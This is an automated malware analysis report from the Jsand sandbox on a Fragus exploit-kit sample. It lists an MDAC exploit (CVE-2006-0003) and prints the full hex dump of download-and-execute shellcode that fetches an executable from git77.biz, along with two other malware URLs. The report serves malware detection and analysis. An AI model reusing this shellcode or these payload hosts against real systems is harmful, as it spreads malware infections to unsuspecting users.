Analysis report for file 6223f79cf6f195fc5589e50f8544bbbc

Sample Overview

File fragus.txt
MD56223f79cf6f195fc5589e50f8544bbbc
Analysis Started 2014-10-26 18:12:11
Report Generated 2014-10-26 18:12:27
Jsand version 2.6.1472

Detection results

DetectorResult
Jsand 2.6.1472 malicious

In particular, the following URL was found to contain malicious content:

Exploits

NameDescriptionReference
MDACArbitrary file download via the Microsoft Data Access Components (MDAC)CVE-2006-0003

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URL
file://fragus.txt
file://6223f79cf6f195fc5589e50f8544bbbc/peg/show.php?get_ajax=1&r=0.2985799557254568
http://google.ru/

ActiveX controls

Shellcode

HexadecimalASCII
33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab 33  c0 b8 61 64 00 00 50 68 
54 68 72 65 35 24 1c 69  74 50 54 53 b8 aa fc 0d 
7c ff 55 04 8b f8 83 c4  0c b0 6c 8a e0 98 50 68 
6f 6e 2e 64 68 75 72 6c  6d 54 b8 8e 4e 0e ec ff 
55 04 93 50 33 c0 50 50  56 8b 55 04 83 c2 7f 83 
c2 4c 52 50 b8 36 1a 2f  70 ff 55 04 5b 57 56 b8 
98 fe 8a 0e ff 55 04 6a  00 ff d7 68 74 74 70 3a 
2f 2f 67 69 74 37 37 2e  62 69 7a 2f 70 65 67 2f 
61 64 66 68 6b 70 7a 32  2e 65 78 65 00 00 
3.d.@0x..@..p...
X....@4.@|.X<jDZ
..+....OZR..V.U.
VW.s<.t3x..V.v..
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f.3..ad..Ph
Thre5$.itPTS....
|.U.......l...Ph
on.dhurlmT..N...
U..P3.PPV.U.....
.LRP.6./p.U.[WV.
.....U.j...http:
//git77.biz/peg/
adfhkpz2.exe..

This shellcode was found on file://6223f79cf6f195fc5589e50f8544bbbc/.

Malware

Additional (potential) malware:

URLTypeHashAnalysis
http://git77.biz/peg/adfhkpz2.exe
N/A
<built-in function hash>
http://git77.biz/peg/file1.exe
N/A
<built-in function hash>
FEEDBACK

Comments